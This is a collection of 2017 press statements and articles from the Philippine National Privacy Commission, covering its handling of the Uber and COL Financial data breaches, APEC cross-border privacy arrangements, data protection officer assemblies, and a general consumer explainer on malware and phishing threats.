- We have received reports of irregular processing following the report of the breach, but we are still investigating these claims and their link to the 2016 data breach incident. As usual, we expect full cooperation from Uber on these matters.
-
PH Strengthens Extraterritorial Reach through the APEC Cross Border Privacy Enforcement Arrangement
Comments Off on PH Strengthens Extraterritorial Reach through the APEC Cross Border Privacy Enforcement Arrangement1. The Philippines has joined the APEC Cross Border Privacy Enforcement Arrangement (CPEA), the government backstop enforcement network developed for the Cross-Border Privacy Rules (CBPR). It is an initiative that facilitates information sharing among privacy enforcement authorities in APEC economies, provide mechanisms to promote effective cross-border privacy cooperation, and encourage information sharing and cooperation with authorities outside APEC.
2. Administrators of the CPEA on Thursday confirmed the NPC’s status as a Privacy Enforcement Authority (PEA) for the Philippines, becoming the eleventh PEA along with those from eight other APEC economies namely, Australia, Canada, Hong Kong, Japan, Republic of Korea, New Zealand, US, Mexico.
3. Privacy Commissioner and Chairman Raymund Enriquez Liboro on Tuesday said that as a next step, the NPC is convening local stakeholders to build consensus around formally joining the APEC CBPR.
4. Dubbed the APEC CBPR Manila Workshop, the 2-day workshop was conducted at the Sofitel Philippine Plaza Manila with the theme "Making the APEC Cross-Border Privacy Rules Scalable." It was jointly organized by the NPC and the US Department of Commerce, with participation by the Federal Trade Commission.
5. “The CBPR System, enables Philippine-based companies to get their data-privacy and protection systems certified with a local Accountability Agent. This would allow them to freely transfer data to all CBPR-participating countries. For businesses, this would mean less hassle as certification would amount to meeting the privacy requirements of each member-country in the system,” Liboro said.
6. To date five APEC economies are already part of the CBPRs, namely, South Korea, Canada, Japan, Mexico and the United States.
7. The APEC CBPR system is a regional, multilateral cross-border data transfer mechanism and enforceable privacy code of conduct developed for businesses by the 21 APEC member economies. The CBPRs implement the nine high-level APEC Privacy Framework principles.
8. Although all APEC economies have endorsed the system, participation requires individual APEC economies to officially express their intent to join, adhere to a set of common principles, and show that an effective enforcement mechanism is in place.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the Uber Personal Data Breach
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro on the Uber Personal Data BreachPress Statement
28/11/20171. Yesterday, Uber wrote to us in compliance with their commitment to provide more detailed information about their data breach of October 2016.
2. In that letter, Uber confirmed to us that personal information of Filipinos were exposed in the data breach. As such, the National Privacy Commission has jurisdiction over the data breach insofar as it affects these Filipino citizens.
3. Unfortunately, Uber failed to provide the level of detail that we expect from personal information controllers about data breach notifications, such as the actual number of Filipinos affected, and the scope of their exposure. However, they declared the following:
- Two individuals outside Uber inappropriately accessed user data stored on a third-party cloud-based service that Uber uses.
- The two Uber employees who led the response to the data breach are no longer with Uber.
- The compromised data includes the names and driver’s license of around 600,000 drivers in the United States and some personal information of 57 million Uber users around the world. The information included names, emailaddresses and mobile phone numbers.
- The incident did not breach Uber’s corporate systems; there is no indication that trip location history, credit card numbers, bank account numbers, or dates of birth were downloaded.
- Filipino data subjects are affected, but there is no indication that any Filipino driver's licenses were downloaded.
- Uber has implemented security measures to restrict access to and strengthen controls on their cloud-based storage accounts.
4. Under the principle of accountability, we require personal information controllers within our jurisdiction to provide detailed information on the nature of the incident, the scope of the exposure, and the remedial measures taken.
5. While Uber has repeatedly asserted that there has been no evidence of fraud or misuse tied to the incident, the concealment of a data breach bears serious consequences under the Data Privacy Act of 2012.
6. If so qualified, those responsible for the concealment of the breach and for the exfiltration of the data may face serious civil and criminal liability.
7. We appreciate the continued participation and cooperation of Uber in this investigation. On their own initiative, Uber has placed an information page available within the Accounts and Payment Options menu within the Help section of the Uber app. Filipino data subjects may avail of this feature.
8. The investigation continues. We are also cooperating with the data privacy authorities of Australia and the United States on this matter.
9. We are not here to merely prosecute offenses against data privacy, but to work with all stakeholders to ensure that we keep moving toward a safer data ecosystem where data flows freely and securely.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on NPC's November 23 meeting with Uber PH
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro on NPC's November 23 meeting with Uber PHPress Statement
24/11/20171. The National Privacy Commission summoned Uber to a meeting on Thursday, November 23, 5:30 PM to discuss the self-reported breach that was admitted by the CEO of the transport network vehicle service company.
2. Uber came to the meeting represented by its Data Protection Officer, Atty. Yves Gonzalez, accompanied by external counsel.
3. Unfortunately, Uber failed to provide the Commission with vital information at the meeting, especially on whether Filipino data are involved, citing limited information from their US Office.
4. We cannot rule out at that this time that any Filipino data was compromised.
5. Uber committed to respond in detail to the Commission’s queries about the nature of the breach, what data was involved, and what measures were applied to address the breach, as soon as confirmed data becomes available.
6. The Commission has set a 48-hour deadline for Uber to provide vital information about the breach.
7. The NPC has reminded Uber that the concealment of a data breach that involves sensitive personal information or information that, under the circumstances, can be used to enable identity fraud, is a criminal offense punishable under the Data Privacy Act of 2012.
8. The NPC has tapped its network of privacy regulators, particularly the Federal Trade Commission of the US, to share information on this incident.
-
Statement of Privacy Commissioner Raymund Enriquez Liboro on the personal data breach sustained by Uber in 2016
Comments Off on Statement of Privacy Commissioner Raymund Enriquez Liboro on the personal data breach sustained by Uber in 2016Late last night, Uber Chief Executive Officer Dave Khosrowshahi issued a statement to the public announcing that personal data of around 50 million Uber users and 7 million Uber drivers were compromised in a security incident dating back to October 2016, and that Uber concealed the fact of this security incident.
The National Privacy Commission (NPC) is concerned about the possible impact of the breach on our citizens. By virtue of its operations and processing of Filipino end user data, Uber is considered a Personal Information Controller and must comply with Philippine data privacy and protection laws.
To this end, we have summoned Uber to a meeting on November 23, 2017 to shed more light about the incident and to comply with the formal breach notification procedure as provided by the Data Privacy Act of 2012 (Republic Act No. 10173). This includes providing the NPC with detailed information on the nature of the breach, the personal data of Filipinos possibly involved, and the measures taken by Uber to address the breach.
We will release vital information to the public as they become available.
-
Statement of the Privacy Commissioner Raymund Enriquez Liboro on the possible personal data breach sustained by COL Financial Group, Inc.
Comments Off on Statement of the Privacy Commissioner Raymund Enriquez Liboro on the possible personal data breach sustained by COL Financial Group, Inc.The National Privacy Commission has received a notification at 3:30 in the afternoon of October 20, 2017, Friday, from COL Financial Group, Inc. of a potential data breach to its system.
We note that this notification has adhered to standard breach reporting protocols set forth in NPC Circular 16-03, on Personal Data Breach Management.
In the notification, the company said that "sometime in the afternoon of 17 October 2017" it detected "a possible breach" in its system that "may involve some personal client information".
The company has assured the NPC that it has taken immediate measures to address the incident, creating a response team to look into the "likelihood of the threat and probable extent of a data breach, if any."
Attached to the notification is a preliminary report giving additional details of what its breach response team has done as of Friday. The company said it ran an initial vulnerability scan of its website, the result of which was "favorable". It also mentioned the company hiring a third party group to perform an independent security and vulnerability check of the system.
At present, the COL Financial has been upfront and transparent in handling this incident. This includes notification to the NPC and the affected data subjects within 72 hours upon knowledge or reasonable belief that a breach has occurred.
The Commission shall be expecting to receive from COL Financial a full report on the incident within five days. This will aid us to more accurately investigate the incident and decide on our further course of action.
We are assuring the public especially the clients of COL Financial Group , Inc. that the NPC is monitoring this incident and shall be issuing new information to all concerned as soon as they become available.
-
NPC Statement on SALN and Data Privacy
Comments Off on NPC Statement on SALN and Data PrivacyPrivacy Commissioner and Chairman Raymund Enriquez Liboro is issuing the following statement related to the Data Privacy and SALN redaction issue:
-
- The Data Privacy Act (DPA) is not designed to prevent access to personal information under any circumstances. Rather, it promotes responsible and lawful use of personal information. Section 11 of the DPA states:
“The processing of personal information shall be allowed, subject to compliance with the requirements of this Act and other laws allowing disclosure of information to the public and adherence to the principles of transparency, legitimate purpose and proportionality.”
- The DPA is not meant to serve as subterfuge for preventing the processing and/or disclosure of personal information sanctioned under law.
- Based on the foregoing, the first two questions that must be addressed are: a) What is the legal basis for the SALN? and b) What does that legal basis call for?
Section 8 of RA 6713 (Code of Conduct and Ethical Standards for Public Officers and Employees) states:
“Public officials and employees have an obligation to accomplish and submit declarations under oath of, and the public has the right to know, their assets, liabilities, net worth and financial and business interests including those of their spouses and of unmarried children under eighteen (18) years of age living in their households.
These information include: a) real property, its improvements, acquisition costs, assessed value and current fair market value; b) personal property and acquisition cost; c) all other assets such as investments, cash on hand or in banks, stocks, bonds, and the like; d) liabilities, and; e) all business interests and financial connections.
The SALN must also identify and disclose a public official’s relatives in the Government in the form, manner and frequency prescribed by the Civil Service Commission.”
The SALN is mandated by RA 6713 to be publicly available, and the public’s right to know is guaranteed under this law. Information required by RA 6713 pertaining to assets, liabilities and net worth, as well as the financial and business interests of the spouse and unmarried children under 18, cannot be redacted. Other personal information should be disclosed only when necessary for a legitimate purpose.
- The next question that should be asked is whether the current SALN specifically asks for the information required under RA 6713. The current SALN reflects the enumeration stated above, while the only additional information required are the identities, date of birth, and ages of all the declarant’s children aged below 18 and residing in his/her household.
An argument can be made that an exhaustive list is not specifically required under RA 6713 except for those children who have specific business interests. However, due consideration must be made on the objectives of Section 8 of RA 6713, in that it serves as a lifestyle check measure on government officials, as well as the purpose envisioned by the Civil Service Commission (CSC) in enforcing the law.
- The Data Privacy Act (DPA) is not designed to prevent access to personal information under any circumstances. Rather, it promotes responsible and lawful use of personal information. Section 11 of the DPA states:
Any information that may not be explicitly required by RA 6713 to be reflected in the SALN should be assessed for its proportionality and necessity to the purposes and objectives contemplated by said law.
- Hereon, the CSC may review the fields of the current SALN to ensure that it contains information sanctioned by RA 6713 and other applicable laws. Personal information outside this purview should be subjected to the requirements found in the Data Privacy Act specifically applying the principle of proportionality in determining whether to include certain fields of personal data in the current SALN form, such as names of minor children and the specific residential address of the filer, when disclosing the forms to the public.
Overall, the country is still taking baby steps when it comes to implementing the Data Privacy Act and the FOI EO. Fully grasping its mechanisms would take a little time and will not happen overnight. What is important is that our citizens, especially those in the media sector, are engaged and that the government remains steadfast in viewing both privacy and transparency as important values to every Filipino.
About the NPC: The National Privacy Commission is a regulatory and quasi-judicial body organized by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. The agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a goal of promoting economic growth and innovation.
-
-
Ahead of PHIE, Private Hospitals Complying with Data Privacy Act
Comments Off on Ahead of PHIE, Private Hospitals Complying with Data Privacy ActWith the upcoming implementation of the Philippine Health Information Exchange (PHIE), private hospitals have committed to comply with the Data Privacy Act (DPA) of 2012 and are implementing data protection measures in their data processing systems to protect sensitive personal information of their patients. This was revealed at the first general assembly of Data Protection Officers (DPO) of Private Hospitals.
The event, called DPO7 is the seventh in a series of DPO sectoral assemblies organized by the Commission this year and has gathered participants from private hospitals. DPO7 was coorganized in cooperation with the Private Hospitals Association of the Philippines, Incorporated(PHAPI).
The PHIE is an electronic health (eHealth) initiative of the Department of Health (DOH), the Department of Science and Technology (DOST) and the Philippine Health Insurance Corporation (PhilHealth) that would ensure accurate and timely health information exchange that can be instrumental in improving the services of these three agencies as well as the other organizations that could use the said data.
Privacy Commissioner Raymund Enriquez Liboro said that: “The efficient use of electronic medical records (EMR) for eHealth has a lot of potential benefits for our citizens. It is a good example of innovation in the free flow of information that the DPA espouses. The protection of personal information has to be prioritized in such systems as there is greater danger of data breaches with the increased number of users and processors” Commissioner Liboro added.
Health information is considered sensitive personal information that requires a higher level of data protection, and private hospitals agree with this. According to Dr. Rustico Jimenez of Medical Center Parañaque and PHAPI President: “Hospitals have always valued information privacy, this one of the reasons why our industry will soon be having the Health Privacy Code which is also in line with the Data Privacy Act of 2012. Hospitals are cleaning up their patient records to be ready for the full implementation of the Philippine Health Information Exchange (PHIE) which is currently under development.” Dr. Jimenez added.
In November of last year the NPC received a complaint about a hospital that did not have adequate security measures for their patient records. The NPC conducted a compliance check of the hospital and will be issuing a compliance order for the hospital to implement to ensure that patient data is protected.
Penalties for violations of data privacy that involve sensitive personal information (SPI) are higher than those that involve personal information, as such, SPI need to be accorded a higher level of protection. An example of this is unauthorized disclosure; under the DPA, the maximum fine of the unauthorized disclosure of personal information is one million pesos, while if it involves SPI it’s two million pesos.
Last month, the NPC announced the mandatory registration of data processing systems of Hospitals including primary care facilities, multi-specialty clinics, custodial care facilities, diagnostic or therapeutic facilities, specialized out-patient facilities and other organizations processing genetic data. The mandatory registration applies to all entities that fall under these categories regardless of the number of employees or number of personal records it processes. The Implementing rules of the Data Privacy Act state that entities that have more than 250 employees or those that processes sensitive personal data of more than 1000 individuals are required to register their data processing systems with then NPC, beginning with the designation and registration of a DPO.
For medical research, patient information is invaluable and is a significant contributor to the development of new treatment methods, the anonymization of health data may be done to protect the identities of the patients in research. According to Deputy Privacy Commissioner Dr. Ivy Patdu; “We want to anonymize or de-identify health information, but we must also note that advancements in technology and the availability of volumes of data may make reidentification possible. The thrust should be towards incorporating ethics in use of information, and focusing on accountability. We may one day also consider data donation, for patients to donate their health information to science and research upon their death, the same way organs are donated.” Dr. Patdu added.
About NPC: The NPC is a regulatory and quasi-judicial body constituted in March 2016 by virtue of RA 10173. As the Philippines’ data privacy and data protection watchdog, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation. To know more about the NPC you can visit www.privacy.gov.ph
-
NPC Orders Take-down of Prostitution Web Pages
Comments Off on NPC Orders Take-down of Prostitution Web PagesThe National Privacy Commission (NPC) has ordered the take-down of web pages that promote prostitution of Filipino citizens to local and foreign adult audiences. The adult classified advertisements sections of backpage.com and its mirror site cracker.com violated provisions of the Data Privacy Act of 2012, The Expanded Anti-Trafficking in Persons Act of 2012 and the The Anti-Child Pornography Act of 2009, as well as the sites’ own Terms and Conditions. Posts in the adult classifieds sections on the web pages of the aforementioned sites were determined by the NPC to be solicitations for prostitution, constituted acts of human trafficking, and were violations of data privacy particularly of photos that do not have the consent of the data subjects.
The NPC take-down action was prompted by a complaint to the Commission that Facebook profile photos were being used used on the illegal pages without their consent or knowledge.
According to Privacy Commissioner Raymund Enriquez Liboro: “The use of Facebook profile photos without consent of data subjects is a clear data privacy violation and can affect a person’s reputation negatively. This is a clear bait and switch tactic of prostitution rings in order to get customers. The NPC is here to protect people by protecting their data from unauthorized use.”
The NPC communicated with backpage.com and cracker.com informing them of the illegal activities happening on their web pages, directing them to take down the adult section of backpage.com’s Philippine microsites. The Adult Classifieds section was taken down shortly after. “We are pleased to know that they (backpage.com) have complied with our order and we didn’t have to coordinate with foreign regulators to safeguard our citizen’s data” NPC Chairman Liboro added.
-
NPC: Late Registrants, May Face Privacy Compliance Checks
Comments Off on NPC: Late Registrants, May Face Privacy Compliance ChecksPublic and private companies that failed to beat the September 9 deadline for the registration of their data processing systems starting with the registraton of their Data Protection Officer (DPO) could face compliance checks, the National Privacy Commission (NPC) warned.
Since September 9 fell on a Saturday, a non-working day, the deadline automatically moves to the next working day, on Monday of September 11, 2017.
“Failure to register may subject a company or an agency to compliance checks, compliance orders, and depending on attendant circumstances may be considered evidence of unauthorized processing, punishable under the Data Privacy Act.,” said Chairman and Privacy Commissioner Raymund Enriquez Liboro. “For one thing, in case an organization
suffers a data breach in the future, its non-registration would imply lack of due diligence, critical in defending against charges of negligence,” Liboro added.“We will continue accepting DPO registration papers from controllers and processors even after the Monday deadline but such will be considered “late registrants”, and included in the list of priority organizations for a data privacy compliance check.” Said Commissioner Liboro.
A compliance check by the NPC means an organization will be subjected to a comprehensive compliance validation process based on 10 critical aspects of accountability, which the NPC has termed as the Data Governance Framework. The compliance check involves interviews, operations inspection, documents analysis, and pertinent activities intended to appraise the organization’s culture of privacy.
Several conglomerates have registered their DPOs with the NPC, among them are companies under the Ayala Group, the SM Group of companies as well as the Lucio Tan Group, One of the first companies that was able to comply with the designation and registration of a DPO was Philippine National Bank one of the companies under the Lucio Tan group, they submitted their registration as early as May this year. According to Roland Oscuro, DPO of PNB: “In our industry, the protection of personal data is essential in maintaining the trust of our customers, as well as improving market position. Our long term goal is to develop a culture of privacy within our organization that we hope our employees can take home and share with their family and friends” Mr. Oscuro said.
Unionbank, another banking institution that has complied with the Data Privacy Act is aware of the value of data privacy in the information driven world. According to Henry Aguda, DPO of Unionbank: “Data privacy is the proxy for trust in the information age. Together with the appropriate information security, privacy, as an organizational mindset, paves the way for responsible innovation in both online and onsite banking services. It provides convenience with a foundation for trust. The loss of trust for a bank or any business, for that matter, can be catastrophic."
In case the NPC finds an organization wanting, Liboro said the privacy compliance check could lead to the issuance of a Compliance Order, which enforces specific actions to be performed by the company within a time period. In case the organization did not follow through satisfactorily, it will trigger a formal investigation, that could possibly result in prosecution.
In an effort to give organizations ample time to comply, the commission has earlier divided the registration process into two phases and extended the deadline for the more rigorous second phase to March 8, 2018. The first phase, however, which essentially consists of a DPO registration, is not subject to an extension.
“Much as we may want an extension, we are compelled by law to strictly enforce the September 9 deadline for organizations to register their data processing system, which is exactly one year following the date of effectivity of the IRR (implementing rules and regulations). We understand privacy compliance is something new and we’ve made it easier by dividing it into phases, so that phase one is just all about DPO registration. We cannot, however, be lenient about the deadline itself,” Liboro said.
Section 47 of the IRR of the Data Privacy Act of 2012 requires personal information controller (PIC) or personal information processor (PIP) that employs 250 persons or more to register their information processing system with the NPC. Those that employ fewer than 250 persons are also required to register if their operations involve the processing of personal data that may likely pose a risk to the rights and freedoms of data subjects; the processing is not occasional; or the processing includes sensitive personal information of at least one thousand (1,000) individuals.
Privacy Commissioner Raymund Enriquez Liboro (center, standing) providing support for NPC staff collecting Data Protection Officer (DPO) registration and supporting documents on the eve of the deadline (8 September 2017) of the registration of DPOs. -
NPC Survey: Filipinos Value Data Privacy
Comments Off on NPC Survey: Filipinos Value Data PrivacySpeakers, organizers and participants of a Data Protection Officers' General Assembly for Media and Social Media professionals pose for a group photo. The event called DPO6 is the 6th of a series of industry specific seminars and workshops organized by the National Privacy Commission (NPC) aimed at improving compliance with the Philippines' data protection and data privacy regulations. A study commissioned by the National Privacy Commission (NPC) reveals that for a great majority of Filipino adults, data privacy rights are important and they want organizations that collect personal information to provide details on how and where the data will be used.
The National Privacy Commission revealed the information at a general assembly of Data Protection Officers (DPO) from the Media and Social Media sector. The nationwide survey conducted by the Social Weather Stations (SWS) in June of this year showed that 94% of Filipino adults wanted to know more about how the personal data they provided during transactions will be used. While 85% of Filipinos agreed that the rights of data subjects are important.
The rights of data subjects when it comes to personal data processing include the right to be informed, the right to object, the right to access, the right to correct, the right to erasure or blocking and the right to damages.
Survey data showed that Filipino adult internet usage is now at 37 percent, a 2 percent increase from last year. From this data it can be concluded that there are 37 million Filipino adult internet users, about 18 million of whom are online for at least one hour every day for various purposes. The top two activities of Filipinos online are getting news (62 percent) and sharing information online (56 percent). Other online activities include getting information on health, and fitness; getting information a sensitive health topic; looking for a job; playing online games; buying things online, studying online courses, visiting online dating sites; and creating or working on own blog.
The SWS survey measured public awareness on issues related to the Data Privacy Act of 2012 as well as the level of trust in public and private organizations that collect and process personal data, which is called in the privacy law as Personal Information Controllers (PICs).
According to Privacy Commissioner Raymund Enriquez Liboro, “Data privacy has become the proxy for trust in today’s information-driven world. It would interest you to know that among private PICs in the Philippines, Filipinos trust schools the most, with a +85 net trust rating, saying they trust schools with their private data, more than they trust hospitals, banks or telcos. The biggest lesson we should learn from schools is that trust is the result of hard work – because it usually takes them several decades to gain earn this kind of reputation,” Liboro told journalists, editors and social media professionals during the opening program of the Data Protection Officers 6 (DPO6) Assembly. The event is the sixth in a series of DPO sectoral assemblies organized by the Commission this year and has gathered participants from the media and social media community. DPO6 was co-organized with Internet rights advocacy group, the Internet Society.
According to Winthrop Yu, Chairman of the Philippine Chapter of the Internet Society: “Privacy has become a real concern in today's ICT-enabled world as companies collect and utilize a person's data, sometimes without the explicit, informed consent of the person concerned. Often this data is used in ways that the person providing the data did not forsee. It's not just about spam. The widespread collection, use, and sharing between companies of personal data can negatively affect one's financial well-being and career prospects."
Media and Social Media are critical to protecting personal data, inappropriately posted personal information on both platforms can cause irreversible harm to data subjects. “The damage to a person’s reputation from inappropriate posts can severely affect the personal lives of of data subjects. We’ve seen how incorrect and unverified posts in media outlets can go viral on social media affecting the subject’s lives as well as their children” Commissioner Liboro added.
About NPC: The NPC is a regulatory and quasi-judicial body constituted in March 2016 by virtue of RA 10173. As the Philippines’ data privacy and data protection watchdog, the agency is mandated to uphold the right to data privacy and ensure the free flow of information, with a view to promoting economic growth and innovation. To know more about the NPC you can visit www.privacy.gov.ph
-
DPO Forum Issue #01
Comments Off on DPO Forum Issue #01We’re opening the very first Philippine Privacy Awareness Week today with the launch of our Data Privacy Newsletter, featuring updates from the NPC, recaps on events and issues for the past few months, and an interview with a DPO.
Get the downloadablehere
-
DPO3: Telco DPOs show commitment to data privacy compliance in NPC assembly
Comments Off on DPO3: Telco DPOs show commitment to data privacy compliance in NPC assemblyThe country’s leading telecommunications firms on Tuesday demonstrated their commitment to upholding data subject rights in the first gathering of Data Protection Officers (DPOs) for the sector conducted by the National Privacy Commission (NPC) at the GT-Toyota Asian Center, Katipunan Avenue, Diliman, Quezon City.
Dubbed DPO3: The Data Protection Officers’ Assembly for the Telecommunications Sector, the event explores opportunities for cooperation between government and telco firms in upgrading the data privacy and security practices in the industry. This is a crucial endeavor, as the telco industry is considered a primary mover of information and innovation in the country.
About 200 DPOs joined the half-day assembly, which aims to provide guidance on how to quickly learn and assert their crucial roles within organizations as guardians and champions of data subject rights.
Through the assembly, the NPC hopes to assist DPOs in promoting a culture of data privacy in their respective organizations, as well as to develop a robust structure for proper data breach management.
Additionally, the NPC aims to establish among the participants a sense of kinship being the pioneering batch of DPOs in the industry and enable them to consult on common concerns, collaborate on mutual projects, and share best practices.
Institutions in the telco industry play a crucial role in delivering the basic communication needs of consumers in the Philippines, and even abroad through their linkages and partnerships with foreign providers. The sector has customized its products and services to cater to its diverse subscribers, providing not just means of communication, but also entertainment, recreation, and financial accommodation, among others. These represent a vast personal data pool processed within the sector, which, if not properly managed and protected, could negatively impact not just the sector itself but a huge chunk of the Philippine economy.
DPO3 is the third in a series of assemblies organized by the NPC following the success of DPO1 last 05 April 2017, which catered to government DPOs, and DPO2 last 31 May 2017 for banks and financial institutions.
-
NPC pushes data privacy compliance in banking sector in upcoming DPO2
Comments Off on NPC pushes data privacy compliance in banking sector in upcoming DPO2The National Privacy Commission (NPC) is set to convene the Data Protection Officers (DPOs) of the financial services sector on 31 May 2017. Dubbed as “DPO2: The 2nd Data Protection Officers’ Assembly,” the event will be held in cooperation with the Bangko Sentral ng Pilipinas (BSP) and the Bankers Association of the Philippines (BAP). It aims to gather data protection officers of different banks who will perform vital duties to ensure their organization’s compliance with the provisions of the Data Privacy Act (DPA) of 2012.
The event is expected to draw more than a hundred DPO delegates from BSP-Supervised Financial Institutions (BSFIs) at the BSP Assembly Hall A, Bangko Sentral ng Pilipinas, Mabini Street, Manila.
The BSP and the BAP have earlier agreed to team up with the NPC for organizing the DPO2 in order to help facilitate prompt and efficient compliance by BSFIs with the privacy law. Thus, aside from being a venue for compliance assistance, the DPO2 shall function as the first step in developing a roadmap for addressing the distinct
concerns of the financial sector with the DPA.The BSP, BAP and the NPC shall also explore ways of harmonizing data privacy compliance obligations under the law with existing BSP regulations already being observed by banks.
“The NPC consider banks a critical sector when it comes to protecting personal data and so far, the level of cooperation we are getting from the sector has been encouraging”, said Privacy Commissioner and Chairman Raymund E. Liboro.
“Customers trust banks not just with their hard-earned money, but also with their personal information. Trust comes with high expectations, and data protection officers within banks play an important role in maintaining this trust, and meeting customers’ expectations,” Commissioner Liboro added. He further explains, “they expect you to work hard at protecting their money and also their privacy. Violating this trust can lead to brand depreciation, revenue loss, or worse — customer exit. DPO2 is an investment in data privacy protection, and it shall go a long way not just in preserving our people’s trust in the financial system, but also in building a strong foundation for data privacy compliance in the private sector.”
DPO2 shall be the first DPO assembly to be conducted by the NPC for the private sector. Commissioner Liboro said plans are also underway to conduct similar events for the health services sector, the academe, and the business process outsourcing industry, among others.
Last April 5, the NPC conducted DPO1 for government data protection officers at the Landbank Plaza in Malate, Manila.
The NPC is a regulatory body created by virtue of RA 10173, otherwise known as the Data Privacy Act of 2012. It is an attached agency of the Department of Information and Communication Technology.
-
Threats to Security and Privacy
Comments Off on Threats to Security and PrivacyKNOW YOUR ENEMY — This timeless piece of advice is especially relevant today as data privacy threats, both online and offline, have become as rampant as ever. Undetected attacks on our privacy may suddenly be leveraged to wreak havoc at any moment. While defenses and legislation struggle to catch up with fast-paced technological advancements, understanding the basic ways in which e-criminals and other ill-willed persons can prey on unsuspecting citizens becomes increasingly important for the common Filipino.
Attacks from identity thieves, hackers, unscrupulous marketers, and other devious actors usually take on a few common forms. Familiarizing ourselves with these forms is one of the best ways through which we can arm and protect ourselves against these attacks. The most common forms are as follows:
Viruses and Worms
Viruses and worms are two of the most common forms of malicious software or malware. Malware can infect a system without the owner’s consent and create duplicates of their codes that can spread to other programs and computers. The effects of these small programs can range from being mildly annoying to being critically damaging to entire databases and software. Of their many uses, one of the most dangerous ways they threaten your data privacy is by opening a backdoor for attackers to access your passwords, IP addresses, banking information, and other personal data.
The crucial difference between the two is how they travel from one computer to another. Viruses are almost always attached to an .EXE or .COM file, through which it runs and can be spread. Worms, on the other hand, can stand alone, using to its advantage the vulnerabilities of systems or trickery.
Trojans
Trojans, named after the infamous Trojan Horse of the Ancient Greeks, are characterized by their deception. This kind of malware is designed to mislead you into downloading it into your system and running it by disguising itself as a harmless file — perhaps as an e-mail about a promo enticing you to download the attachment to avail of a freebie or discount or as a routine form from a bank sent by an impostor. Like viruses and worms, the trojans can grant attackers access to your computer or phone, steal your personal information or download even more pieces of malware. The best defense against this kind of threat, aside from installing anti-virus software and setting up firewalls, is to be wary about opening e-mails sent to you or clicking on pop-ups from websites.
Phishing and Pharming
Phishing and Pharming have both been widely used to get enough personal information about a victim — their full names, addresses, credit card information, usernames, and passwords — to steal their identity online. Phishers use e-mails, instant messaging, and even SMS to lure you into entering your personal information on a fake website, while pharmers attack the DNS (Domain Name System) server of a legitimate website (often bank or e-commerce websites) to redirect its users to a similar website run by the pharmers. Phishing scams are some of the most common attacks on personal data privacy, as it uses simple bait (like its homophone fishing) to be able to extract personal information. While pharming is less common, each successful attack can simultaneously affect thousands of victims.
Adware
Short for advertising-supported software, adware is a piece of programming that displays advertisements for the generation of profit. While some forms of adware are legal and may even be built-into certain applications, some are illegal and are considered malware. These can take on the form of pop-ups or windows that cannot be closed or they can run other forms of malware through infected programs or websites. More covert forms of adware track your web habits while more invasive forms of adware may include key-loggers that track the passwords you type.
Spyware
As the name suggests, spyware is a kind of program that spies on you. Not to be confused with “tracking software,” such as those in corporate computers or homes intended for parents to monitor what their children do on the internet, spyware finds its way into your computer without you knowing or consenting. It then sends your information to people you do not know. Smartphones, in particular, are popular targets for spyware attackers, as some forms of spyware can get information collected through your phone’s camera and microphone to monitor your location, listen in on your phone calls, or collect your personal information.
Ransomware
Ransomware is a type of malware that encrypts your files to hold them ransom, with attackers asking anywhere from a few thousand to millions of pesos to allow you to retrieve your files. These programs can get into your system through phishing scams or malicious websites, and ransomware attacks have become increasingly common, with the Philippines recording at least 17 attacks a day in 2015. The cost of these attacks tend to be much higher than the intended ransom, as security breaches can have long-lasting effects.
-
Holy Week 2017 Advisory for all Data Protection Officers in Government (DPO1)
Comments Off on Holy Week 2017 Advisory for all Data Protection Officers in Government (DPO1)The National Privacy Commission would like to remind all Data Protection Officers to ensure the security of personal data in their respective agencies’ care during the long weekend of Holy Week 2017 (13 to 16 April 2017). This is in order to prevent data breaches such as the one that occurred during the same period in 2016.
The minimal staffing during official holidays like the Holy Week makes data processing systems vulnerable not only to online data breaches but to physical security breaches as well. In this regard, please take the necessary precautions to safeguard personal data.
Among our suggested precautions are as follows:
- Place non-mission critical systems, especially those that contain or have access to personal data, offline.
- For systems that are kept offline, ensure that all system activities are recorded and the aforementioned logs are secure.
- Password-protect or encrypt files and databases on servers, desktop computers, and other devices.
- Conduct a backup of systems and databases.
- Discourage physical breaches by securing office premises adequately.
For your guidance and compliance.
National Privacy Commission
Compliance and Monitoring Division -
Privacy Commission rallies support for data protection in government
Comments Off on Privacy Commission rallies support for data protection in governmentThe National Privacy Commission (NPC) has called on Data Protection Officers (DPOs) in the public sector to get proactive in conducting their duty as watchdogs and advocates of the data privacy rights of Filipinos from within their respective organizations.
Speaking to government data protection professionals on Wednesday at DPO1: The 1st Data Protection Officers’ Assembly, Privacy Commissioner and Chairman Raymund Enriquez Liboro harped on the critical role of DPOs in government in safeguarding the individual’s fundamental right to data privacy, calling it an extension of the government’s mandate to protect its citizens.
“[For] the government to really do its job of protecting the people, it must also protect the people’s data. And that’s exactly why we are here today at DPO1 --- to get the government’s acts together in providing data protection. Being at the forefront of personal data protection, it is incumbent upon you as government DPOs, and the NPC, to get our acts together. Just like what it says in a famous 70’s slogan, Kung ‘di tayo kikilos, sino ang kikilos? Kung ‘di ngayon, kailan pa? (If we won’t act, then who else will? If not now, when?)” Liboro told the event participants.
DPOs from over two hundred government agencies have gathered at the Land Bank Plaza in Malate, Manila for the half-day event, which is the first in a series of DPO assemblies organized by the NPC. To help DPOs quickly build proficiency in marshaling the compliance of their respective organizations, the NPC has provided them with an easy-to-follow template called the Data Privacy Accountability and Compliance Framework. Designed to assist new DPOs easily gain on-the-job proficiency, the framework recommends a programmed series of activities within a 30, 60 and 90-day period. If fully implemented, Liboro said the framework could facilitate an organization’s compliance within three months.
Commissioner Liboro said data protection is everyone’s business, but for DPOs it is a crucial responsibility. In defending people’s data privacy, DPOs are expected to fight physical, technical and organizational threats to data security. Some of the things to watch out for by the government DPO are security threats related to employee negligence, bring your own device (BYOD), phishing, and spyware.
“In functioning as protector of people’s data, the DPO becomes an enabler of privacy rights. By your collective efforts, it is you DPOs, who make data protection a practical, day-to-day reality inside each of your organizations, on the ground-level,” Liboro told the DPO1 participants.
Tailor-fitted to the unique needs of government DPOs, the event is designed to provide them with access to self-learning resources, DPO1 compliance tool kit, and the DPO1 web forum, among others.
During the event, the agency also launched its website, which caters not just to DPOs but to the general public, especially those who want to learn more about their data privacy rights and file complaints.
